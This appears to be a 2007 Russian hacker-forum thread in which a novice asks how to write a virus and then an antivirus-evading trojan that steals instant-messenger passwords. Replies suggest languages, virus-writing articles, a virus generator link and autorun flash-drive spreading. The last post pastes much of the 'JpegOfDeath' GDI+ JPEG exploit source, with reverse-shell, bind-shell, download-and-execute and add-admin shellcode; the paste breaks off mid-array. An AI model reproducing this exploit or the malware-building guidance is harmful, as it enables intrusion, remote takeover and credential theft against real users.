хотел бы написать вирус
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
хотел бы написать вирус - 2007-07-12 21:37:25.570000
|
|
|
ZavodiJIo
Сообщений: 40
Оценки: 0
Присоединился: 2006-11-11 12:51:51.803333
|
проюзав на днях такие вири как pinch/xinch и т.д. и почитав топики на эту тему ине очень захотелось написать чтото своё.Скрипты я незнаю, но готов с этим бороться =).Подскажите пожалуйста с чем мне нужно ознакомиться, какие проги скачать, может быть какие то учебники есть (на компе имею 2 учебника по HTML и по java)
ps очень прошу помоч а не говорить чтото типа "ухахахах вот нюб иди спать" я просто хотел бы чемуто научиться …
заранее большое спасибо
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-12 21:46:52.633333
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
Мда, ну на HTML и java ты вирус точно не напишешь, тебе бы assembler освоить. C++, но, думаю терпения у тебя не хватит :D
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-12 21:50:30.790000
|
|
|
Mahoraz
Сообщений: 2908
Оценки: 30
Присоединился: 2007-03-15 20:51:18.450000
|
Тебе нужен именно вирус или что угодно, лишь бы палилось антивирусом?
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-12 21:55:17.370000
|
|
|
Matrix_Neo
Сообщений: 23
Оценки: 0
Присоединился: 2006-05-31 19:30:45
|
Насколько я помню, пинч это троян. Да и вирусы сейчас не рулят. Рулят трои. А именно: бэкдоры, pws-трояны, диалеры и прочие. Пишут их на разных языках, но уж точно не на html или java:). Самый простой для изучение имхо Делфи. Почитай книжку М. Фленова "Библия Делфи". Там подробно описан сам принцип программирования, куча примеров, которые очень помогают при изучении. После прочтения простенький трой написать, думаю, сможешь.
З.Ы. разумеется, если тебе так хочется написать вирус, Делфи тоже на это способен=) Только не забывай, что распространение их(как впрочем и любого другого вредоносного ПО) незаконно;)
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-12 21:58:15.320000
|
|
|
Puparro
Сообщений: 1669
Оценки: 0
Присоединился: 2007-05-04 09:57:18.383333
|
quote:
ORIGINAL: ZavodiJIo
очень захотелось написать чтото своё.
Если это очередной "Снос винды" - то, хочется начать зевать….
Твой-то вирус на выполнение какой задачи будет ориентирован?
Может и языков осваивать не придётся….
(А ты, Василий Иванович… минет… смог бы дать?
А вот, минет, Петьк,.. не дал бы….. языков не знаю.)
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-12 22:33:05.540000
|
|
|
ZavodiJIo
Сообщений: 40
Оценки: 0
Присоединился: 2006-11-11 12:51:51.803333
|
quote:
ORIGINAL: blonx
Мда, ну на HTML и java ты вирус точно не напишешь, тебе бы assembler освоить. C++, но, думаю терпения у тебя не хватит :D
вот с этого места поподробней дайте чтоли какие нить сцылки или с чего там начать? может мне помогут какие то статьи?
мне нужен трой который не будет палиться антивирями и пришлёт мне пассы (особенно меня интересуют такие вещи как qip,miranda,ramblerICQ и т.д.)
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-12 22:53:23.180000
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
quote:
ORIGINAL: ZavodiJIo
quote:
ORIGINAL: blonx
Мда, ну на HTML и java ты вирус точно не напишешь, тебе бы assembler освоить. C++, но, думаю терпения у тебя не хватит :D
вот с этого места поподробней дайте чтоли какие нить сцылки или с чего там начать? может мне помогут какие то статьи?
с путешествия до книжного магазина, и выбора книжки про программированию на одном из языков: C, C++, pascal, delphi, assembler. неплохо было бы, если бы первая (не вводная) глава, не вызывала проблем при пробном чтении, и была бы глава посвящённая программированию в win32api. купив книжку тщательно её изучаешь. дальше писать алгоритм действий лень, но закончив с книжкой приходи, я продолжу.
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 11:54:27.653333
|
|
|
BEBETMAN
Сообщений: 7
Оценки: 0
Присоединился: 2007-07-10 14:56:27.616666
|
ухахахах вот нюб иди спать
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 12:30:31.780000
|
|
|
ZavodiJIo
Сообщений: 40
Оценки: 0
Присоединился: 2006-11-11 12:51:51.803333
|
2 BEBETMAN
ну я смотрю ты прям остряк…Ты наверно сын петросяна ? или может ты и есть петросян?
2 rgo, слуш а без книжного магаз никак? может есть какието электронные учебники?
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 12:44:49.543333
|
|
|
blacksun
Сообщений: 2360
Оценки: 0
Присоединился: 2006-09-27 03:05:59.350000
|
Аффтар ты вначале хорошо выучи каконитьбудь язык типа С++, делфи или асма, а потом уже думай ..
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 12:48:43.860000
|
|
|
ZavodiJIo
Сообщений: 40
Оценки: 0
Присоединился: 2006-11-11 12:51:51.803333
|
та плин неужели? правда? выучить язык да? подкинул бы лучше ссылок каких нить полезнзных.:@
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 13:22:10.583333
|
|
|
blacksun
Сообщений: 2360
Оценки: 0
Присоединился: 2006-09-27 03:05:59.350000
|
а спросить здесь http://google.ru несудьба? [sm=cl.gif]
А потом заглянуть сюда: http://forum.xakep.ru/m_891224/tm.htm
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 13:42:22.583333
|
|
|
BEBETMAN
Сообщений: 7
Оценки: 0
Присоединился: 2007-07-10 14:56:27.616666
|
quote:
ORIGINAL: ZavodiJIo
2 BEBETMAN
ну я смотрю ты прям остряк…Ты наверно сын петросяна ? или может ты и есть петросян?
2 rgo, слуш а без книжного магаз никак? может есть какието электронные учебники?
Нет! Я не петросян! Я БэБэтМЕНТ-заика! Из спец-отдела по борьбе с компьютерными хулиганами!
Спокойствие - скоро я вас настигну!!!
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 13:44:41.820000
|
|
|
blacksun
Сообщений: 2360
Оценки: 0
Присоединился: 2006-09-27 03:05:59.350000
|
Бетман, молчать, иди летай
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 14:58:52.083333
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
quote:
ORIGINAL: ZavodiJIo
2 rgo, слуш а без книжного магаз никак? может есть какието электронные учебники?
есть. гугль тебе в помощь. но я _рекомендую_ купить книгу бумажную. может даже две или три. собственно я начинал самообучение именно таким путём, и считаю что это правильно.
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 15:03:05.506666
|
|
|
Аяз
Сообщений: 40
Оценки: 0
Присоединился: 2007-07-13 11:10:15.266666
|
Список статей, по которым тебя могут осудить за вирусописательство, я приводить здесь не буду. А для того, чтобы твоя "программа" одержала победу над самыми крутыми антивирусами, для начала изучи ассемблер. Желательно по материалам сайта www.wasm.ru - год назад этот сайт позволил мне сдать учебный курс по ассемблеру за семестр вместо положенных двух. (время, которое ты потратить на освоение ассемблера окупится обязательно)
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 16:03:34.850000
|
|
|
ZavodiJIo
Сообщений: 40
Оценки: 0
Присоединился: 2006-11-11 12:51:51.803333
|
спасибо вам большое за помощ надеюсь в скором будущем написать свой первый вирь/трой…
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 17:09:52.646666
|
|
|
Mahoraz
Сообщений: 2908
Оценки: 30
Присоединился: 2007-03-15 20:51:18.450000
|
Лучше напиши что-нибудь полезное
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 17:16:28.740000
|
|
|
хаkep2323
Сообщений: 2726
Оценки: 2
Присоединился: 2007-04-07 17:50:58.343333
|
Автор, а почему ты сразу захотел написать именно вирус?
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 21:04:09.630000
|
|
|
ZavodiJIo
Сообщений: 40
Оценки: 0
Присоединился: 2006-11-11 12:51:51.803333
|
хм а можно и ОС:D ну вот токо название нада придумать.Хммм может Водкус?
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-13 21:08:17.630000
|
|
|
Mahoraz
Сообщений: 2908
Оценки: 30
Присоединился: 2007-03-15 20:51:18.450000
|
Сначала напиши, а название потом придумаем
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-14 00:04:19.996666
|
|
|
Krik99
Сообщений: 197
Оценки: 0
Присоединился: 2007-04-07 13:13:31.816666
|
Учи VBScript на нём легче всего псать разные виры. Ну вкрайнем можеш написать Bat-ником…
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-14 19:29:00.380000
|
|
|
Webkill
Сообщений: 606
Оценки: 0
Присоединился: 2007-05-06 06:59:04.066666
|
Н да но в истории мало чего запоминающегося на ботниках, и вбсе. Кроме "I love you" !
Начинай с этого, потом переходи на что-нить по сложнее так и до С++ доберёшся)
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-15 01:41:42.330000
|
|
|
=Ra$caL=
Сообщений: 18
Оценки: 0
Присоединился: 2006-12-10 04:21:20.466666
|
Воть тут есть статии как писать виры
http://www.wasm.ru/publist.php?list=6
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-16 10:51:02.040000
|
|
|
][oTTaбь]4
Сообщений: 18
Оценки: 0
Присоединился: 2007-03-18 19:23:35.250000
|
Процесс подгоовки к написанию вируса:
1) изучаем русский язык
2) изучаем английский
3) изучаем расположение клавиш на клавиатуре
4) изучаем Delphi
5) изучаем C/C++
6) изучаем Assembler
уф, всё. Можно писать. Надеюсь, к тому времени когда ты всё это выучишь, охота писать вирусы не пропадёт.
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-17 10:30:10.180000
|
|
|
ToP
Сообщений: 72
Оценки: 0
Присоединился: 2006-10-29 12:43:21.693333
|
Пробей поиском прогу Апокалипсис 2.0 для ламера подойдет.
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-17 20:11:28.423333
|
|
|
Shastik
Сообщений: 1
Оценки: 0
Присоединился: 2007-07-14 18:48:34.113333
|
так есть же такое мнение, типа если хочешь стать программитсом, достаточно понять, как работает чужая программа (ес-но прога не из 10 строчек!!!). берешь какой-нить вирус, открываешь исходник через прогу, на какой он был написан(делфи, си, ассемблер), че не понятно, смотришь по книжке, спрашиваешь у друзей, на форуме
|
|
|
|
|
RE: хотел бы написать вирус - 2007-07-17 20:21:42.190000
|
|
|
BatonXAK
Сообщений: 1137
Оценки: 0
Присоединился: 2007-03-02 20:44:00.803333
|
Ребята тип не собирается ни че учить он хочет ограничится тем что прочел пару тем по написанию вируса на С++ передерет код откампилит и будит думать что он крут!!!!!!!
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-04 16:51:51.920000
|
|
|
Refresh
Сообщений: 606
Оценки: 0
Присоединился: 2006-04-08 20:00:54
|
Аффтор я бы тебе посоветовал хотя бы VB изучить имхо дальше легче будет!
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-04 17:11:55.156666
|
|
|
blacksun
Сообщений: 2360
Оценки: 0
Присоединился: 2006-09-27 03:05:59.350000
|
quote:
ORIGINAL: Refresh
Аффтор я бы тебе посоветовал хотя бы VB изучить имхо дальше легче будет!
ВБ отстой, пусть сразу учит асм или С++ .. кто думает, что асм сложный, пусть выпьет йаду
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-04 22:01:45.530000
|
|
|
Maaak
Сообщений: 29
Оценки: 0
Присоединился: 2007-03-01 21:39:53.346666
|
возми генератор вирей, и успокойся http://hackzona.3dn.ru/load/6
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-05 00:23:09.623333
|
|
|
wilderwind
Сообщений: 269
Оценки: 0
Присоединился: 2006-05-28 13:41:45
|
Мбугога, шо я ещё могу сказать!
А на VBS ещё Melissa была…
И можно открыть Блокнот, вбить что-то типа shutdown -r -t 00, сохранить как *.bat, поставить другу в автозагрузку и наслаждаться. Но это тупо и не креативно.
Можно, опять же, открыть Блокнот, создать авторан.инф со всеми прилегающими и бегать с флешкой по знакомым. Но тоже не креативно :(
Интересно, конечно, попробовать свои силы в создании киберживности, но не лучше ли сделать чё-нибудь полезное или хотя бы безобидную шутку? Обязательно нужно учинять тотальный дестрой, блин…
Хотя я тоже этим грешил поначалу, каюсь!
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-05 16:19:23.446666
|
|
|
BlooDex87
Сообщений: 44
Оценки: 0
Присоединился: 2007-01-12 14:16:27.210000
|
/*
* Exploit Name:
* =============
* JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload
* =============
* Tweaked Exploit By M4Z3R For GSO
* All Credits & Greetings Go To:
* ==========
* FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack
* Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,
* Nick Fitzgerald, Adam Nance (where are you?),
* Santa Barbara, Jenna Jameson, John Kerry, so1o,
* Computer Security Industry, Rom Hackers, My chihuahuas
* (Rocky, Sailor, and Penny)…
* ===========
* Flags Usage:
* -a: Add User X with Pass X to Admin Group;
* IE: Exploit.exe -a pic.jpg
* -d: Download a File From an HTTP Server;
* IE: Exploit.exe -d http://YourWebServer/Patch.exe pic.jpg
* -r: Send Back a Shell To a Specified IP on a Specific Port;
* IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337)
* -b: Bind a Shell on The Exploited Machine On a Specific Port;
* IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)
* Disclaimer:
* ===========
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
// Exploit Data…
main(){
char reverse_shellcode[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
"\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
char bind_shellcode[] =
"\xD9\xE1\xD9\x34\x24\x58\x58\x58"
"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
"\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
char http_shellcode[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";
char admin_shellcode[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3"
"\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68"
"\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68"
"\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89"
"\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53"
"\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31"
"\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00"
"\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69"
"\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89"
"\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51"
"\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49"
"\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00\xff\x56\x14"
"\xff\x56\x0c\x56\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24\x18"
"\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01"
"\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38"
"\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1"
"\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
"\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";
char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
char setNOPs1[] =
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
char setNOPs2[] =
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
char header2[] =
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
